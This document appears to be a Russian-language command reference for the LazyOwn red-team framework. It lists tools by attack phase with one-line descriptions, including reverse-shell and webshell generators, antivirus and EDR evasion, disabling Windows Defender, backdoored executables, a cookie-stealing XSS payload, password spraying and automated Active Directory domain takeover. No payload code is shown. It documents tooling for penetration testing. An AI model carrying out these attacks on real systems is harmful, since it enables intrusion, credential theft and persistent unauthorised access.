Эта функция выполняет инструмент сканирования веб-безопасности Skipfish.
smbattackФаза: перечисление | Источник: cli/commands/scan_migrated.py
Сканирует хосты с открытым SMB-сервисом на порту 445 в указанной целевой сети.
smbclientФаза: перечисление | Источник: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:
smbclient_impacketФаза: перечисление | Источник: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:
smbclient_pyФаза: перечисление | Источник: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient.py для выполнения следующих операций:
smbmapФаза: перечисление | Источник: cli/commands/enum.py
smbmap -H 10.10.10.3 [ОПЦИИ]
smtpuserenumФаза: перечисление | Источник: cli/commands/scan_migrated.py
Перечисляет пользователей SMTP с помощью инструмента smtp-user-enum методом VRFY.
snmpcheckФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет проверку SNMP на указанном целевом хосте.
snmpwalkФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет проверку SNMP на указанном целевом хосте.
swaksФаза: перечисление | Источник: cli/commands/scan_migrated.py
Отправляет электронное письмо с помощью swaks (швейцарский армейский нож для SMTP).
vscanФаза: перечисление | Источник: cli/commands/scan.py
Выполняет сканирование портов с помощью vscan с заданными параметрами.
wfuzzФаза: перечисление | Источник: cli/commands/recon.py
Использует wfuzz для выполнения фаззинга на основе предоставленных параметров. Эта функция поддерживает различные опции для фаззинга каталогов и файлов.
windapsearchФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент windapsearch для перечисления домена Active Directory через LDAP-запросы.
wpscanФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда wpscan: устанавливает и запускает WPScan для сканирования уязвимостей WordPress.
aclpwn_pyФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент aclpwn.py для поиска и эксплуатации путей ACL для повышения привилегий в среде Active Directory.
adcs_checkФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Проверяет службы сертификации Active Directory на наличие уязвимостей ESC1-ESC8.
addspn_pyФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент addspn.py для управления именами субъектов служб (SPN) в учётных записях Active Directory через LDAP.
auto_pwnФаза: эксплуатация | Источник: cli/commands/pwn.py
Запускает полную автоматизированную цепочку эксплуатации против цели.
autoblodyФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент autobloody для автоматизации путей повышения привилегий в Active Directory.
cacti_exploitФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Автоматизирует эксплуатацию уязвимости Cacti версии 1.2.26.
chainФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Запускает автономную цепочку эксплуатации: разведка -> уязвимость -> эксплойт -> пост-эксплойт.
commixФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает commix для тестирования внедрения команд.
cpФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Копирует файл из каталога ExploitDB в каталог sessions.
createcookieФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Создаёт файл cookie.txt в каталоге sessions с указанным значением cookie.
createdllФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Создаёт DLL-файл для Windows с помощью MinGW-w64 или Blazor DLL для Linux.
digdugФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет Dig Dug для увеличения размера исполняемого файла, используя предварительно настроенные параметры.
download_exploitФаза: эксплойт | Источник: cli/commands/exploit.py
Загружает и настраивает эксплойт, при необходимости обслуживая его через HTTP.
downloaderФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Генерирует команду загрузчика для файлов в каталоге sessions.
eternalФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Автоматизирует процесс эксплуатации EternalBlue (MS17-010) с использованием Metasploit.
excelntdonutФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Генерирует макрос Excel 4.0 (XLM) из предоставленного исходного файла C# с помощью EXCELntDonut.
exploit_chainФаза: эксплойт | Источник: cli/commands/pwn.py
Многошаговая цепочка эксплойтов на основе ИИ с запасными стратегиями.
exploit_recommendФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Рекомендация эксплойтов на основе ИИ — сопоставляет обнаруженные сервисы с CVE.
filteringФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Применяет различные методы фильтрации к заданной командной строке, изменяя каждый символ или слово соответствующим образом.
gets4uticket_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент gets4uticket.py из PKINITtools для запроса сервисного билета S4U2Self с использованием Kerberos.
gettgtpkinit_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент gettgtpkinit.py из PKINITtools для запроса TGT с использованием Kerberos PKINIT с сертификатом PFX или PEM.
greatSCTФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент GreatSCT для генерации полезных нагрузок, обходящих антивирусные решения и списки разрешённых приложений.
img2cookieФаза: эксплойт | Источник: cli/commands/exploit.py
Генерирует XSS-полезную нагрузку, которая крадёт cookie через тег изображения.
jwt_toolФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Использует jwt_tool для анализа, модификации или эксплуатации JSON Web Tokens (JWT).
krbrelayx_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент krbrelayx.py для ретрансляции Kerberos или злоупотребления неограниченной делегацией.
kusaФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает генератор полезных нагрузок Kusanagi.
lazypwnФаза: эксплойт | Источник: cli/commands/exploit.py
Выполняет автоматизированный скрипт эксплуатации LazyPwn.
lfiФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эксплуатирует потенциальную уязвимость локального включения файлов (LFI) путём создания
lolФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эксплуатирует цель, внедряя вредоносную полезную нагрузку и собирая информацию об администраторе.
lolbas_useФаза: эксплойт | Источник: cli/commands/pwn.py
Выполняет конкретную технику LOLBAS.
ms08_067_netapiФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
SMB CVE-2008-4250. Уязвимость с использованием модуля ms08_067_netapi из Metasploit.
ntpdateФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Синхронизирует системные часы с указанным NTP-сервером.
ownereditФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент Impacket owneredit для изменения владельца объектов Active Directory.
padbusterФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет команду PadBuster для атак padding oracle.
powerserverФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эта функция генерирует PowerShell-скрипт, который получает обратную оболочку (reverse shell) по HTTP на системе Windows.
printerbug_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент printerbug.py для запуска ошибки SpoolService через обратное RPC-подключение.
psexecФаза: эксплойт | Источник: cli/commands/enum.py
Выполняет инструмент Impacket PSExec для попытки удаленного выполнения на указанной цели.
psexec_pyФаза: эксплойт | Источник: cli/commands/enum.py
Выполняет инструмент Impacket PSExec для попытки удаленного выполнения на указанной цели.
py3ttyupФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Копирует команду Python reverse shell в буфер обмена.
pyautomateФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Автоматизирует выполнение инструментов pwntomate на XML-файлах конфигурации.
pyoracle2Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент pyOracle2 для выполнения атак padding oracle.
pywhiskerФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент pyWhisker для манипулирования атрибутом msDS-KeyCredentialLink целевого пользователя или компьютера.
rejetto_hfs_execФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
HttpFileServer версии 2.3. Уязвимый с использованием модуля rejetto_hfs_exec из metasploit.
revФаза: эксплойт | Источник: cli/commands/exploit.py
Копирует однострочную команду reverse shell в буфер обмена.
seoФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет веб-скан для снятия отпечатков (fingerprinting) SEO с помощью lazyseo.py.
sharpshooterФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет фреймворк создания полезной нагрузки (payload) для получения и выполнения произвольного исходного кода C#.
shellfireФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Запускает Shellfire с различными опциями и позволяет генерировать полезные нагрузки.
shellshockФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет атаку Shellshock против цели.
sirepratФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Команда sireprat: автоматизирует настройку и использование SirepRAT для выполнения различных атак на устройство Windows IoT Core.
sqliФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Запрашивает у пользователя URL, базу данных, таблицу и столбцы, а затем выполняет Python-скрипт.
sqli_mssql_testФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Инициирует обратную оболочку MSSQL, запуская HTTP-сервер для обработки входящих подключений и кражи данных.
sqlmapФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает SQLMap против целевого URL для тестирования SQL-инъекций.
sqshФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент Impacket sqsh для изменения владельца объектов Active Directory.
ssФаза: эксплойт | Источник: cli/commands/recon.py
Ищет все источники эксплойтов и сопоставляет результаты со следующей командой LazyOwn.
sshexploitФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эксплуатирует уязвимость OpenSSH CVE-2023-38408 через функцию PKCS#11 ssh-agent.
stealth_onФаза: эксплойт | Источник: cli/commands/pwn.py
Включает скрытый режим для последующих операций.
template_helper_serializerФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Обрабатывает создание и сериализацию вспомогательного шаблона.
ticketerФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает Impacket ticketer для создания золотых/серебряных билетов.
unicode_WAFbypassФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Мы открываем Netcat-слушатель на порту 443 и пытаемся эксплуатировать десериализацию NodeJS, отправляя
upload_bypassФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Command upload_bypass: Автоматизирует установку и выполнение Upload_Bypass для проведения тестов на обход загрузки файлов.
utfФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Кодирует заданную полезную нагрузку в UTF-16 escape-последовательности.
winbase64payloadФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Создает полезную нагрузку в кодировке base64 специально для Windows для выполнения команды PowerShell или загрузки файла с использованием self.params['lhost'].
wrapperФаза: эксплойт | Источник: cli/commands/exploit.py
Копирует полезные нагрузки LFI php-wrapper в буфер обмена.
wwwФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает простой HTTP-сервер на настроенном порту для раздачи полезных нагрузок.
xssФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет процедуру тестирования уязвимости XSS (межсайтовый скриптинг).
xsstrikeФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Команда xsstrike: Устанавливает и запускает XSStrike для поиска XSS-уязвимостей.
add2findФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Добавляет новую пользовательскую команду в систему 'find', сохраняется в user_commands.json.
adversaryФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Эмулятор противника LazyOwn RedTeam, вы можете настроить своих собственных противников в adversary.json.
adversary_yamlФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Выполнить противника из YAML в lazyadversaries/*.yaml.
aes_peФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Шифрование с помощью AES и случайного ключа в PE EXE файл для использования с загрузчиками.
apt_proxyФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Настраивает локальную машину с доступом в Интернет для работы в качестве APT-прокси для машины без доступа в Интернет.
apt_repoФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Создает полный локальный APT-репозиторий с улучшенным разрешением зависимостей.
atomic_lazyownФаза: постэксплуатация | Источник: cli/commands/postexp.py
Выполнение атомарных red-team тестов через LazyOwn.
bin2shellcodeФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует бинарный файл в строку шеллкода в формате C или Nim.
convert_remcomsvc_from_fileФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует байтовую строку Python REMCOMSVC из remcomsvc.py в формат среза байтов Golang, выводит образец и сохраняет его в sessions/remcomsvc.go. см. lazyaddon GoPEInjection.
cportsФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Генерирует команду для отображения TCP и UDP портов и копирует её в буфер обмена.
create_syntheticФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Создает базовый синтетический плейбук из Nmap CSV, когда LLM не работает.
createpayloadФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Генерирует обфусцированную полезную нагрузку для обхода обнаружения AV с помощью инструмента payloadGenerator. спасибо smokeme.
d3monizedshellФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Выполняет инструмент D3m0n1z3dShell для обеспечения персистентности в Linux.
disableavФаза: постэксплуатация | Источник: cli/commands/postexp.py
Создает VBS-скрипт для попытки отключения Windows Defender.
exe2binФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует файл .exe в бинарный файл.
exe2donutbinФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует файл .exe в бинарный файл donut.
extract_yamlФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Извлекает YAML из существующего отладочного файла и пытается создать плейбук.
findФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Автоматизирует выполнение команд на основе списка алиасов и команд.
follinaФаза: постэксплуатация | Источник: cli/commands/postexp.py
Запускает настройку эксплойта Follina (CVE-2022-30190).
hex2shellcodeФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует сырую шестнадцатеричную полезную нагрузку из msfvenom в совместимый с NASM формат шеллкода. Настраивает локальную машину с доступом в интернет для работы в качестве прокси для машины без доступа в интернет.
issue_command_to_c2Фаза: postexp | Источник: cli/commands/postexp_migrated.py
Выполняет команду на клиенте через C2. Для загрузки: вы должны поместить файл в sessions/temp_upload или использовать команду download_c2.
lazywebshellФаза: postexp | Источник: cli/commands/postexp.py
Запускает веб-шелл сервер LazyOwn на порту 8888.
mimikatzpyФаза: postexp | Источник: cli/commands/postexp.py
Запускает Mimikatz через Python (в стиле impacket).
ofuscate_payloadФаза: postexp | Источник: cli/commands/postexp_migrated.py
Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.
ofuscate_stringФаза: postexp | Источник: cli/commands/postexp_migrated.py
Обфусцирует строку в код Go.
ofuscateshФаза: postexp | Источник: cli/commands/postexp_migrated.py
Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.
ofuscatorps1Фаза: postexp | Источник: cli/commands/postexp.py
Обфусцирует PowerShell-скрипт.
path2hexФаза: postexp | Источник: cli/commands/postexp_migrated.py
Преобразует путь к бинарному файлу в x64 little-endian шестнадцатеричный код для инъекции шеллкода.
pezorshФаза: postexp | Источник: cli/commands/postexp_migrated.py
Выполняет инструмент PEzor для упаковки исполняемых файлов или шеллкода с пользовательскими конфигурациями.
pip_proxyФаза: postexp | Источник: cli/commands/postexp_migrated.py
Настраивает локальную машину с доступом в интернет для работы в качестве pip-прокси для машины без доступа в интернет.
pip_repoФаза: postexp | Источник: cli/commands/postexp_migrated.py
Настраивает локальный pip-репозиторий для предоставления Python-пакетов для установки на скомпрометированной машине без доступа в интернет.
powershell_cmd_stagerФаза: postexp | Источник: cli/commands/postexp_migrated.py
Генерирует и выполняет PowerShell командный stager для запуска .ps1 скрипта.
rmfromfindФаза: postexp | Источник: cli/commands/postexp_migrated.py
Удаляет пользовательскую команду по индексу (как показано в 'find').
rubeusФаза: postexp | Источник: cli/commands/postexp_migrated.py
Копирует команду в буфер обмена для загрузки и запуска Rubeus.
scavengerФаза: postexp | Источник: cli/commands/postexp.py
Запускает сборщик данных пост-эксплуатации Scavenger.
scpФаза: postexp | Источник: cli/commands/postexp_migrated.py
Копирует локальную директорию "sessions" на удалённый хост с помощью scp, используя sshpass для автоматической аутентификации.
service_sshФаза: postexp | Источник: cli/commands/postexp_migrated.py
Создаёт файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.
sessionsshstraceФаза: postexp | Источник: cli/commands/postexp_migrated.py
Подключает strace к запущенному процессу и записывает вывод в файл.
shellcodeФаза: postexp | Источник: cli/commands/postexp.py
Генерация и управление шеллкодом.
shellcode2elfФаза: postexp | Источник: cli/commands/postexp_migrated.py
Преобразует шеллкод в ELF-файл и заражает его.
shellcode2sylkФаза: postexp | Источник: cli/commands/postexp_migrated.py
Преобразует шеллкод в формат SYLK и сохраняет результат в файл.
shellcode_searchФаза: postexp | Источник: cli/commands/postexp_migrated.py
Ищет шеллкоды в API shell-storm по заданным ключевым словам.
ssh_cmdФаза: postexp | Источник: cli/commands/postexp_migrated.py
Выполняет удалённую команду через SSH, используя настроенного пользователя start_user. Смотрите help grisun0 для настройки пользователя-бэкдора.
yara_scanФаза: postexp | Источник: cli/commands/postexp_migrated.py
Сканирует файлы или директории с помощью YARA-правил на наличие вредоносных программ/IOC.
asprevbase64Фаза: persist | Источник: cli/commands/persist_migrated.py
Создаёт ASP reverse shell полезную нагрузку в кодировке Base64 и копирует её в буфер обмена.
backdoor_factoryФаза: persist | Источник: cli/commands/persist_migrated.py
Создаёт исполняемый файл с бэкдором с помощью backdoor-factory.
beaconcfgФаза: persist | Источник: cli/commands/persist_migrated.py
Сгенерировать C2-профиль beacon с изменением трафика и подменой домена (domain fronting).
conptyshellФаза: persist | Источник: cli/commands/persist.py
Загружает ConPtyShell и подготавливает команду запуска PowerShell.
createrevshellФаза: persist | Источник: cli/commands/persist.py
Создаёт bash-скрипт reverse shell в папке sessions/.
createwebshellФаза: persist | Источник: cli/commands/persist.py
Создаёт веб-шеллы (PHP под видом JPG, p0wny-shell, ASP).
createwinrevshellФаза: persist | Источник: cli/commands/persist.py
Создаёт Windows reverse shell (PowerShell).
darkarmourФаза: persist | Источник: cli/commands/persist_migrated.py
Использует инструмент darkarmour для генерации необнаруживаемой версии PE-исполняемого файла.
dr0p1tФаза: persist | Источник: cli/commands/persist_migrated.py
Запускает инструмент Dr0p1t для создания скрытого дроппера вредоносного ПО.
ftpФаза: persist | Источник: cli/commands/persist_migrated.py
Подключается к FTP-хосту, используя учётные данные из файла и указанный порт.
generate_revshellФаза: persist | Источник: cli//commands/persist_migrated.py
Генерирует reverse shell на различных языках программирования.
grisun0Фаза: persist | Источник: cli/commands/persist_migrated.py
Создаёт и копирует команду shell для добавления нового пользователя, назначения пароля, добавления пользователя в группу sudo и переключения на этого пользователя.
grisun0wФаза: persist | Источник: cli/commands/persist_migrated.py
Создаёт и копирует команду PowerShell для добавления нового пользователя, назначения пароля, добавления пользователя в группу «Администраторы» и переключения на этого пользователя.
ivyФаза: persist | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью Ivy с различными параметрами. Ivy — это фреймворк для создания полезных нагрузок для выполнения произвольного исходного кода VBA (макросов) непосредственно в памяти. Загрузчик Ivy делает это, используя программный доступ в среде объектов VBA для загрузки, расшифровки и выполнения шеллкода.
knokknokФаза: persist | Источник: cli/commands/persist_migrated.py
Отправляет специальную строку для запуска reverse shell с командой 'c2 client_name'.
listener_goФаза: persist | Источник: cli/commands/persist_migrated.py
Настраивает и запускает слушатель для указанной жертвы.
listener_pyФаза: persist | Источник: cli/commands/persist_migrated.py
Настраивает и запускает слушатель для указанной жертвы.
msfpcФаза: persist | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью MSFvenom Payload Creator (MSFPC).
paranoid_meterpreterФаза: persist | Источник: `cli/commands/persist_migrated.py
Создаёт и разпливает параноидальную полезную нагрузку Meterpreter и слушатель с закреплением SSL/TLS и отслеживанием UUID.
pwncatФаза: persist | Источник: cli/commands/persist_migrated.py
Запускает pwncat с указанным портом для прослушивания. SELFINJECT
pwncatcsФаза: persist | Источник: cli/commands/persist.py
Запускает слушатель reverse shell pwncat-cs.
rdpФаза: persist | Источник: cli/commands/persist_migrated.py
Читает учётные данные из файла, шифрует пароль и выполняет команду подключения к RDP.
revwinФаза: persist | Источник: cli/commands/persist.py
Создаёт исполняемый файл Windows reverse shell.
scarecrowФаза: persist | Источник: cli/commands/persist_migrated.py
Выполняет ScareCrow с различными параметрами для обхода EDR-решений и выполнения шеллкода.
serviceФаза: persist | Источник: cli/commands/persist_migrated.py
Создаёт файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.
setoolKitsФаза: persist | Источник: cli/commands/persist_migrated.py
Выполняет рабочий процесс SEToolKit для генерации полезной нагрузки Meterpreter.
toctocФаза: persist | Источник: cli/commands/persist_migrated.py
Отправляет магический пакет китайскому вредоносному ПО.
veilФаза: persist | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью Veil-Evasion с различными параметрами.. Veil-Evasion — это ферймворк для создания полезных нагрузок.
weevelyФаза: persist | Источник: cli/commands/persist_migrated.py
Подключается к PHP-бэкдору с помощью Weevely, защищённому указанным паролем.
weevelygenФаза: persist | Источник: cli/commands/persist_migrated.py
Сгенерировать PHP-бэкдор с помощью Weevely, защищенный указанным паролем.
wmi_lateralФаза: persist | Источник: cli/commands/persist.py
Выполнить команду на удаленном хосте через WMI.
wmi_persistФаза: persist | Источник: cli/commands/persist.py
Создать подписку на событие WMI для сохранения доступа (без файлов, без записи на диск).
wmi_scheduled_taskФаза: persist | Источник: cli/commands/persist.py
Создать запланированное задание для сохранения доступа через WMI.
crystal_ballФаза: privesc | Источник: cli/commands/crystal_ball.py
Анализировать вывод linpeas/winpeas и ранжировать векторы повышения привилегий с точными командами.
gtfoФаза: privesc | Источник: cli/commands/privilege_escalation.py
Найти бинарный файл в базах знаний GTFOBins и LOLBas (parquet).
juicypotatoФаза: privesc | Источник: cli/commands/privilege_escalation.py
Раздавать JuicyPotato по HTTP для повышения привилегий в Windows.
lesФаза: privesc | Источник: cli/commands/privilege_escalation.py
Запустить Linux Exploit Suggester для версии ядра.
linpeasФаза: privesc | Источник: cli/commands/privilege_escalation.py
Раздавать linpeas.sh по HTTP и вывести однострочную команду для целевой системы.
printspooferФаза: privesc | Источник: cli/commands/privilege_escalation.py
Раздавать PrintSpoofer по HTTP для повышения привилегий в Windows.
privesc_cmd_by_osФаза: privesc | Источник: cli/commands/privilege_escalation.py
Подготовить и отправить команду linpeas/winpeas клиенту C2.
privesc_suggestФаза: privesc | Источник: cli/commands/crystal_ball.py
Быстрый псевдоним для crystal_ball --auto.
pspyФаза: privesc | Источник: cli/commands/privilege_escalation.py
Раздавать монитор процессов pspy по HTTP.
responderФаза: privesc | Источник: cli/commands/privilege_escalation.py
Запустить Responder на настроенном device с повышенными привилегиями.
smbserverФаза: privesc | Источник: cli/commands/privilege_escalation.py
Поднять SMB-сервер Impacket с тремя вариантами ретрансляции.
sudoФаза: privesc | Источник: cli/commands/privilege_escalation.py
Перезапустить фреймворк с root-привилегиями, если они отсутствуют.
sudo_privescФаза: privesc | Источник: cli/commands/privilege_escalation.py
Проанализировать вывод sudo -l и сверить с GTFOBins.
suid_checkФаза: privesc | Источник: cli/commands/privilege_escalation.py
Вывести команды для перечисления SUID/SGID, готовые для вставки на целевой системе.
whoami_privФаза: privesc | Источник: cli/commands/privilege_escalation.py
Вывести команды для перечисления привилегий для целевой ОС.
winpeasФаза: privesc | Источник: cli/commands/privilege_escalation.py
Раздавать вариант winPEAS по HTTP и вывести однострочную команду для целевой системы.
addusersФаза: cred | Источник: cli/commands/cred_migrated.py
Открывает или создает файл users.txt в каталоге sessions для редактирования с помощью nano.
adsso_sprayФаза: cred | Источник: cli/commands/cred_migrated.py
Выполняет атаку перебором паролей (password spray) на Azure Active Directory Seamless Single Sign-On (SSO) с использованием заданного списка пользователей.
cewlФаза: cred | Источник: cli/commands/cred.py
Сгенерировать словарь из веб-сайта с помощью cewl.
crack_cisco_7_passwordФаза: cred | Источник: cli/commands/cred_migrated.py
Взломать хэш пароля Cisco Type 7 и отобразить открытый текст.
createcredentialsФаза: cred | Источник: cli/commands/cred_migrated.py
Создает файл credentials.txt в каталоге sessions с указанными именем пользователя и паролем.
createhashФаза: cred | Источник: cli/commands/cred_migrated.py
Создает файл hash.txt в каталоге sessions с указанным значением хэша и анализирует его с помощью Name-the-hash.
createmailФаза: cred | Источник: cli/commands/cred_migrated.py
Сгенерировать перестановки email на основе полного имени и self.params['domain'], затем сохранить их в файл.
createusers_and_hashsФаза: cred | Источник: cli/commands/cred_migrated.py
Команда createusers_and_hashs: Извлекает имена пользователей и хэши из файла дампа.
credФаза: cred | Источник: cli/commands/cred_migrated.py
Отобразить учетные данные, хранящиеся в файле credentials.txt, и скопировать пароль в буфер обмена.
creds_pyФаза: cred | Источник: cli/commands/cred.py
Извлечь учетные данные из файла или вывода команды.
crunchФаза: cred | Источник: cli/commands/cred.py
Сгенерировать словари с помощью crunch.
cubesprayingФаза: cred | Источник: cli/commands/cred_migrated.py
Команда cubespraying: автоматизирует установку и использование CubeSpraying для выполнения атак с распылением учетных данных.
dacleditФаза: cred | Источник: cli/commands/cred_migrated.py
Выполнить команду dacledit.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.
generatedicФаза: cred | Источник: cli/commands/cred_migrated.py
Генерирует словарь на основе имени цели и списка символов с различными комбинациями.
hashcatФаза: cred | Источник: cli/commands/cred.py
Запустить взлом паролей с помощью hashcat.
hydraФаза: cred | Источник: cli/commands/cred.py
Запустить Hydra для онлайн-атак на пароли.
john2hashФаза: cred | Источник: cli/commands/cred.py
Преобразовать хеш в формат John the Ripper.
john2keepasФаза: cred | Источник: cli/commands/cred_migrated.py
Перечислить все файлы .kdbx в каталоге 'sessions', позволить пользователю выбрать один и запустить
john2zipФаза: cred | Источник: cli/commands/cred_migrated.py
Перечислить все файлы .zip в каталоге 'sessions', позволить пользователю выбрать один и запустить команду
keepassФаза: cred | Источник: cli/commands/cred_migrated.py
Открыть файл .kdbx и вывести заголовки и содержимое всех записей. Пароль может быть предоставлен через
medusaФаза: cred | Источник: cli/commands/cred.py
Запустить Medusa для онлайн-атак на пароли.
passtightvncФаза: cred | Источник: cli/commands/cred_migrated.py
Расшифровывает пароли TightVNC с помощью Metasploit.
passwordsprayФаза: cred | Источник: cli/commands/cred_migrated.py
Выполнить распыление паролей с помощью crackmapexec с заданными параметрами.
refill_passwordФаза: cred | Источник: cli/commands/cred_migrated.py
Сгенерировать список возможных паролей, заполняя каждую звездочку во входных данных символами, указанными пользователем.
rockyФаза: cred | Источник: cli/commands/cred_migrated.py
Уменьшает словарь на основе заданной длины пароля.
searchhashФаза: cred | Источник: cli/commands/cred_migrated.py
Помогает найти типы хешей в Hashcat, просматривая его вывод справки.
smalldicФаза: cred | Источник: cli/commands/cred_migrated.py
Обрабатывает создание временных файлов для пользователей и паролей на основе небольшого словаря.
spraykatzФаза: cred | Источник: cli/commands/cred.py
Запустить SprayKatz для распыления учетных данных.
sshkeyФаза: cred | Источник: cli/commands/cred.py
Сгенерировать пару ключей SSH.
transformФаза: cred | Источник: cli/commands/cred_migrated.py
Преобразует входную строку в соответствии с заданным пользователем стилем регистра.
username_anarchyФаза: cred | Источник: cli/commands/cred_migrated.py
Сгенерировать имена пользователей с помощью инструмента username-anarchy на основе ввода пользователя.
addcliФаза: lateral | Источник: cli/commands/lateral_migrated.py
Добавить клиента для выполнения команд c2
bitmФаза: lateral | Источник: cli/commands/bitm.py
Менеджер атак типа «браузер посередине».
bloodyADФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполнить команду bloodyAD.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.
chiselФаза: lateral | Источник: cli/commands/lateral.py
Запустить chisel для быстрого туннелирования.
dcomexecФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет инструмент Impacket dcomexec для запуска команд на удаленной системе с помощью DCOM.
dominionФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполнить полностью автоматический захват домена Active Directory.
getTGTФаза: lateral | Источник: cli/commands/lateral_migrated.py
Запрашивает билет предоставления билетов (TGT) с помощью инструмента Impacket с предоставленными учетными данными.
gospherusФаза: lateral | Источник: cli/commands/lateral_migrated.py
Command gospherus: Клонирует и использует инструмент Gopherus для генерации gopher-полезных нагрузок для различных сервисов.
id_rsaФаза: lateral | Источник: cli/commands/lateral_migrated.py
Создаёт файл закрытого SSH-ключа и подключается к удалённому хосту по SSH.
lateral_mov_linФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет латеральное перемещение, загружая и устанавливая LazyOwn на удалённой Linux-машине.
ligoloФаза: lateral | Источник: cli/commands/lateral.py
Запускает Ligolo-ng для продвинутого пивотинга.
mssqlcliФаза: lateral | Источник: cli/commands/lateral_migrated.py
Пытается подключиться к серверу MSSQL с помощью инструмента mssqlclient.py с аутентификацией Windows.
ncФаза: lateral | Источник: cli/commands/lateral.py
Прослушивание или подключение через Netcat.
ngrokФаза: lateral | Источник: cli/commands/lateral.py
Запускает туннель ngrok.
penelopeФаза: lateral | Источник: cli/commands/lateral_migrated.py
Команда penelope: Устанавливает и запускает Penelope для работы с reverse и bind shell.
regeorgФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет инструмент reGeorg для туннелирования HTTP(s) через SOCKS-прокси.
rncФаза: lateral | Источник: cli/commands/lateral_migrated.py
Запускает nc с rlwrap на указанном порту для прослушивания.
